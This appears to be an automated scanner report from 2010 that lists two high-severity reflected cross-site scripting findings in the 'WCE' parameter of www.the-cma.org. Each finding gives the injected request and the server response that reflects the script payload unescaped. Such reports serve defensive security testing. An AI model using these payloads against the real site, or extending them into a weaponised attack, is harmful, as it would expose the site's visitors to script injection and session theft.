1. Cross-site scripting (reflected)
1.1. http://www.the-cma.org/ [WCE parameter]
1.2. http://www.the-cma.org/ [WCE parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.the-cma.org |
Path: | / |
GET /?WCE=b89ad"><script>alert(1)< Host: www.the-cma.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Fri, 10 Dec 2010 20:28:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9593 Content-Type: text/html Set-Cookie: OasisVisits=4; expires=Fri, 10-Dec-2010 22:52:40 GMT; path=/ Set-Cookie: ASPSESSIONIDAQRQARTR Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>MetaTags=b89ad"> ...[SNIP]... <META NAME='description' content="MetaDescription=b89ad"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.the-cma.org |
Path: | / |
GET /?WCE=5963c</title><script Host: www.the-cma.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Fri, 10 Dec 2010 20:28:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9544 Content-Type: text/html Set-Cookie: OasisVisits=4; expires=Fri, 10-Dec-2010 22:52:42 GMT; path=/ Set-Cookie: ASPSESSIONIDAQRQARTR Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <TITLE>MetaTags=5963c</title><script ...[SNIP]... |